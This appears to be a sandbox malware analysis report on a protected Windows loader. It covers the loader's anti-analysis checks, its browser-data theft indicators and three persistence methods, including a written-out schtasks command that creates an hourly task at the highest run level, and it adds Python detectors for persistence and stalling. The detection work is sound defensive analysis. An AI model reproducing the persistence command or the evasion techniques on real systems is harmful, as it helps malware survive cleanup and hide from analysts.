Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B6F200 VirtualAllocEx,WriteProcessMemory,LoadLibraryA,GetProcAddress,WriteProcessMemory, 0_2_00B6F200
Source: initial sample | Static PE information: section where entry point is pointing to: .vmp\]
Source: file.exe | Static PE information: section name: .vmp\] (three sections carry this name)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D20478 push ecx; retf E65Ch 0_2_00D20502
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CAB275 push FFFFFFD4h; ret 0_2_00CAB286
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C5322B push FFFFFFF7h; iretd 0_2_00CF5CB1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D059DE pushad ; ret 0_2_00D05A0D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C7DEFF push esp; retf 0_2_00C7DF33
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD3F59 push ecx; ret 0_2_00AD3F6C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06BDE70B push es; iretd 0_2_06BDE70C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06BDC245 push esi; ret 0_2_06BDC24E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06BB8F27 push es; ret 0_2_06BB8F45
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06BDEC98 push es; retn 0000h 0_2_06BDECA4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06BDEC7B push es; retf 0_2_06BDEC7C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06BDEC63 push es; ret 0_2_06BDEC64
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06BDE8C3 push es; retf 0000h 0_2_06BDE8C4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06BB5B83 push ecx; ret 0_2_06BB5B96

Boot Survival

The sample installs three independent persistence mechanisms: two scheduled tasks (hourly and at logon, run level HIGHEST, binary under C:\ProgramData), a shortcut in the user's Startup folder, and an HKCU Run value. Any one of them surviving cleanup re-launches the loader.

Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk (reported twice)
Source: C:\Users\user\Desktop\file.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c (reported twice)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06BA7890 GetProcAddress (x10), 0_2_06BA7890
Source: C:\Users\user\Desktop\file.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
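Detection logic for the three persistence mechanisms in this block, as an added example (not Joe Sandbox code or the sample's own): it parses `schtasks /create` command lines and scores the combination seen here (binary in a user-writable directory, `/rl HIGHEST`, a recurring or logon trigger, `/f`, a 32-hex-digit marker in the task name), and flags `.lnk` drops into the Startup folder and writes to the Run/RunOnce keys. The event dicts are a constructed, Sysmon-like shape, not a real telemetry format.

```python
"""Persistence detection over process/file/registry events, modelled on the
schtasks, Startup-folder and Run-key hits in this report. Added example; the
SAMPLE_EVENTS below are constructed (two copied from the report, rest invented)."""
import re
from typing import Optional

PERSISTENT_TRIGGERS = {"onlogon", "onstart", "hourly", "minute", "daily"}
# User-writable directories no legitimate "updater" task should launch from.
SUSPICIOUS_DIRS = ("c:/programdata/", "/appdata/local/temp/", "c:/users/public/")
STARTUP_DIR = "/appdata/roaming/microsoft/windows/start menu/programs/startup/"
RUN_KEY_SUFFIXES = ("/currentversion/run", "/currentversion/runonce")
# /opt followed by an optional "quoted value" or a bare value that is not another /opt
_OPT = re.compile(r'/(\w+)(?:\s+(?:"([^"]*)"|((?!/)[^\s"]+)))?')


def norm(path: str) -> str:
    """Lower-case and forward-slash a Windows path so prefix checks stay simple."""
    return path.replace("\\", "/").lower()


def parse_schtasks(cmdline: str) -> Optional[dict]:
    """Return {option: value} for a 'schtasks /create ...' command line, else None."""
    parts = cmdline.split(None, 1)
    if not parts:
        return None
    head = norm(parts[0].strip('"'))
    if head != "schtasks" and not head.endswith("schtasks.exe"):
        return None
    opts = {k.lower(): (q or b or "") for k, q, b in _OPT.findall(cmdline)}
    return opts if "create" in opts else None


def schtasks_findings(cmdline: str) -> list:
    """Reasons a schtasks /create looks like malware persistence; [] if it looks benign."""
    opts = parse_schtasks(cmdline)
    if opts is None:
        return []
    target = norm(opts.get("tr", ""))
    in_bad_dir = any(d in target for d in SUSPICIOUS_DIRS)
    highest = opts.get("rl", "").lower() == "highest"
    recurring = opts.get("sc", "").lower() in PERSISTENT_TRIGGERS
    # Alert on a binary in a user-writable dir, or on an elevated recurring task;
    # a plain daily task under Program Files stays quiet.
    if not (in_bad_dir or (highest and recurring)):
        return []
    reasons = []
    if in_bad_dir:
        reasons.append(f"task binary in user-writable dir: {opts['tr']}")
    if highest:
        reasons.append("/rl HIGHEST: runs with the user's full (elevated) token")
    if recurring:
        reasons.append(f"recurring trigger /sc {opts['sc']}")
    if "f" in opts:
        reasons.append("/f silently overwrites an existing task of the same name")
    if re.search(r"[0-9a-f]{32}", opts.get("tn", "").lower()):
        reasons.append("task name carries a 32-hex-digit id (per-build/per-victim marker)")
    return reasons


def scan(events: list) -> list:
    """Walk events and return persistence findings with the originating image."""
    findings = []
    for ev in events:
        if ev["kind"] == "process":
            reasons = schtasks_findings(ev["cmdline"])
            if reasons:  # schtasks.exe is the child; the parent planted the task
                findings.append({"technique": "scheduled task", "image": ev["parent"], "reasons": reasons})
        elif ev["kind"] == "file":
            t = norm(ev["target"])
            if STARTUP_DIR in t and t.endswith((".lnk", ".exe", ".bat", ".vbs", ".js")):
                findings.append({"technique": "startup folder", "image": ev["image"], "reasons": [ev["target"]]})
        elif ev["kind"] == "registry":
            if norm(ev["key"]).endswith(RUN_KEY_SUFFIXES):
                findings.append({"technique": "run key", "image": ev["image"],
                                 "reasons": [ev["key"] + "\\" + ev["value"]]})
    return findings


FILE_EXE = r"C:\Users\user\Desktop\file.exe"
SCHTASKS = r"C:\Windows\SysWOW64\schtasks.exe"
SAMPLE_EVENTS = [  # constructed; first two command lines are the ones from the report
    {"kind": "process", "image": SCHTASKS, "parent": FILE_EXE,
     "cmdline": r'schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c HR" /sc HOURLY /rl HIGHEST'},
    {"kind": "process", "image": SCHTASKS, "parent": FILE_EXE,
     "cmdline": r'schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c LG" /sc ONLOGON /rl HIGHEST'},
    {"kind": "process", "image": SCHTASKS, "parent": r"C:\Windows\System32\cmd.exe",  # benign
     "cmdline": r'schtasks /create /tn "Nightly Backup" /tr "C:\Program Files\Backup\backup.exe" /sc DAILY'},
    {"kind": "file", "image": FILE_EXE,
     "target": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk"},
    {"kind": "file", "image": FILE_EXE, "target": r"C:\Users\user\AppData\Local\Temp\_LQmmrlytjrHiMTfplY7yVS.zip"},
    {"kind": "registry", "image": FILE_EXE, "key": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value": "AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c"},
    {"kind": "registry", "image": FILE_EXE, "key": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced",
     "value": "Hidden"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["technique"], "<-", f["image"])
        for r in f["reasons"]:
            print("   ", r)
```

The `/RU "user"` plus `/rl HIGHEST` combination is worth keeping in the rule: it asks for the user's elevated token without a UAC prompt on every trigger, which a benign per-user updater has no reason to request.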

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Stalling execution: Execution stalls by calling Sleep (graph_0-91183)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB6468 rdtsc 0_2_00CB6468
Source: C:\Users\user\Desktop\file.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) (graph_0-91191)
Source: C:\Users\user\Desktop\file.exe TID: 6156 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6156 | Thread sleep time: -31031s >= -30000s
(The negative values are relative delays as passed to NtDelayExecution; the same 30000 shows up as "delay time: 30000" below, i.e. 30 s, which is exactly the signature's threshold.)
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (reported twice)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06BB2EAD GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 0_2_06BB2EAD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06BCCCFD FindFirstFileExW, 0_2_06BCCCFD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06B7B2C0 FindFirstFileA,CreateDirectoryA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,FindNextFileA,FindClose,GetLastError, 0_2_06B7B2C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06B7BAC0 FindFirstFileA,SetFileAttributesA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError, 0_2_06B7BAC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06BD6276 VirtualQuery,GetSystemInfo, 0_2_06BD6276
Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 30000
Note on the three sources below: Amcache.hve.0.dr is the analysis system's own Amcache hive, so its strings describe the VM's hardware and drivers rather than checks embedded in the sample; i6lfSskNm5LrWeb Data.0.dr is a copy of the browser's "Web Data" database dropped by the sample, whose entries carry the analysis VM's product name "VMware20,1". Only the file.exe memory-dump strings show the virtual-disk device path inside the sample's own process.

Source: Amcache.hve.0.dr | Binary or memory string: VMware
Source: Amcache.hve.0.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.0.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.0.dr | Binary or memory string: vmci.sys
Source: Amcache.hve.0.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.0.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.0.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.0.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.0.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.0.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.0.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.0.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.0.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.0.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.0.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.0.dr | Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.0.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.0.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.0.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.0.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.0.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.0.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.0.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.0.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.0.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.0.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.0.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.0.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.0.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom

Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: global block list test formVMware20,11696428655
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: AMC password management pageVMware20,11696428655
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: tasks.office.comVMware20,11696428655o
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: discord.comVMware20,11696428655f
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: outlook.office.comVMware20,11696428655s
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: dev.azure.comVMware20,11696428655j
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: i6lfSskNm5LrWeb Data.0.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h

Source: file.exe, 00000000.00000002.3215883795.00000000062DB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}gramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows``Z
Source: file.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.0000000001769000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.1993911974.000000000177F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}0
Source: file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_649386EC
Source: file.exe, 00000000.00000002.3215883795.0000000006347000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}-
Source: file.exe, 00000000.00000002.3215883795.0000000006357000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}r
Source: file.exe, 00000000.00000002.3215883795.0000000006347000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}~
Source: file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}5b64144ccf1df_1.1.19041.2006_none_d94bc80de1097097\
Source: file.exe, 00000000.00000002.3215883795.0000000006347000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: file.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWL
Source: file.exe, 00000000.00000002.3215228010.0000000001710000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&8
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB6468 rdtsc 0_2_00CB6468
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06BAE580 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW, 0_2_06BAE580
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B6F200 VirtualAllocEx,WriteProcessMemory,LoadLibraryA,GetProcAddress,WriteProcessMemory, 0_2_00B6F200
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B66D00 mov eax, dword ptr fs:[00000030h] (reads the PEB) 0_2_00B66D00
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06B7E3B5 GetHGlobalFromStream,GlobalSize,GlobalLock,VirtualAlloc,RtlGetCompressionWorkSpaceSize,RtlCompressBuffer,GlobalUnlock,GdipDisposeImage,GetProcessHeap,HeapAlloc, 0_2_06B7E3B5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06BB62B6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_06BB62B6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06BB6014 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_06BB6014
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06BBFC07 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_06BBFC07
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06BB5D6C cpuid 0_2_06BB5D6C
Source: C:\Users\user\Desktop\file.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_06BD02FD
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoW, 0_2_06BD0227
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_06BD0121
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoEx,FormatMessageA, 0_2_06BB2CC6
Source: C:\Users\user\Desktop\file.exe | Code function: EnumSystemLocalesW, 0_2_06BC4ADB
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoW, 0_2_06BC5047
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoW, 0_2_06BCFFF8
Source: C:\Users\user\Desktop\file.exe | Code function: EnumSystemLocalesW, 0_2_06BCFC34
Source: C:\Users\user\Desktop\file.exe | Code function: EnumSystemLocalesW, 0_2_06BCFC7F
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_06BCFDA5
Source: C:\Users\user\Desktop\file.exe | Code function: EnumSystemLocalesW, 0_2_06BCFD1A
Source: C:\Users\user\Desktop\file.exe | Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 0_2_06BCF988
Source: C:\Users\user\Desktop\file.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (reported twice)
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation (reported four times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD361D GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 0_2_00AD361D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06B9C990 SetThreadExecutionState,SetThreadExecutionState,GetVersion,GetCurrentThreadId,GetThreadDesktop,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GdiplusStartup,CreateThread,CloseHandle, 0_2_06B9C990
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.0.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.0.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.0.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.0.dr | Binary or memory string: MsMpEng.exe
(The msmpeng.exe strings come from the analysis system's Amcache hive, i.e. the VM's own Defender installation, not from the sample.)
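The stalling hits in this block (Sleep of 30000 ms, a second delay of 31031 ms, rdtsc and paired GetSystemTimePreciseAsFileTime reads, and a decision node whose send/recv/WinExec branch never ran) are the pattern a sandbox's own "sleep >= 30 s before payload" rule keys on. The following added example (not Joe Sandbox code) implements that triage over a per-thread API trace: it sums requested delay before the first payload-class call, converts NtDelayExecution's negative 100 ns relative intervals to milliseconds (which is why such reports print delays as negative numbers), and counts time-read / sleep / time-read triplets, the shape of a check for whether the sandbox skipped the sleep. The trace is constructed, with the two delays taken from the report and everything else invented.

```python
"""Stalling / timing-check triage over an API call trace. Added example, not
Joe Sandbox code; TRACE is constructed (only the two delay values come from
the report) and the 30 s threshold copies the report's "-30000s >= -30000s"."""
from collections import defaultdict

SLEEP_APIS = {"Sleep", "SleepEx", "NtDelayExecution"}
TIME_APIS = {"GetTickCount", "GetTickCount64", "QueryPerformanceCounter",
             "GetSystemTimePreciseAsFileTime", "rdtsc"}
PAYLOAD_APIS = {"send", "recv", "connect", "WinExec", "CreateProcessW", "WriteFile"}


def sleep_ms(api: str, arg) -> float:
    """Normalise a sleep argument to milliseconds.
    Sleep/SleepEx take milliseconds. NtDelayExecution takes a LARGE_INTEGER in
    100 ns units: negative = relative delay, positive = absolute deadline (ignored
    here, since it is not a stalling pattern)."""
    if api == "NtDelayExecution":
        return -arg / 10_000 if arg < 0 else 0.0
    return float(arg)


def stalling_report(trace, threshold_ms: int = 30_000) -> dict:
    """Per thread id: sleep requested before the first payload-class API,
    number of T-S-T (time read, sleep, time read) timing checks, whether the
    thread ever reached a payload API, and the stalling verdict."""
    per = defaultdict(lambda: {"sleep_ms": 0.0, "timing_checks": 0,
                               "reached_payload": False, "last": []})
    for tid, api, arg in trace:
        t = per[tid]
        if t["reached_payload"]:
            continue  # only delay *before* the payload counts as stalling
        if api in PAYLOAD_APIS:
            t["reached_payload"] = True
        elif api in SLEEP_APIS:
            t["sleep_ms"] += sleep_ms(api, arg)
        # sliding window over the last three call classes: T(ime), S(leep), O(ther)
        cls = "T" if api in TIME_APIS else "S" if api in SLEEP_APIS else "O"
        t["last"] = (t["last"] + [cls])[-3:]
        if t["last"] == ["T", "S", "T"]:
            t["timing_checks"] += 1
    return {tid: {"sleep_ms": t["sleep_ms"],
                  "timing_checks": t["timing_checks"],
                  "reached_payload": t["reached_payload"],
                  "stalling": t["sleep_ms"] >= threshold_ms}
            for tid, t in per.items()}


# Constructed trace: (thread id, API, argument). 203.0.113.5 is a TEST-NET address.
TRACE = [
    (6156, "GetTickCount", None),
    (6156, "Sleep", 30000),                       # 30 s, as in the report
    (6156, "GetTickCount", None),                 # T-S-T: did the sandbox shorten the sleep?
    (6156, "NtDelayExecution", -310_310_000),     # 31.031 s as a relative 100 ns interval
    (6156, "IsDebuggerPresent", None),
    (6156, "connect", ("203.0.113.5", 50500)),    # first payload-class call
    (6156, "send", b"\x00\x01"),                  # after the payload: not counted
    (7000, "Sleep", 100),
    (7000, "WriteFile", r"C:\Users\user\AppData\Local\Temp\out.zip"),
]

if __name__ == "__main__":
    for tid, r in stalling_report(TRACE).items():
        print(tid, r)
```

A thread that stalls past the threshold but never reaches a payload call is the case the "decision node followed by non-executed suspicious API" signature describes; in this trace thread 6156 does reach `connect`, so the verdict rests on the accumulated 61 s of requested delay.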

Stealing of Sensitive Information

Source: Yara match | File source: 0.3.file.exe.6454b80.4.raw.unpack, type: UNPACKEDPE
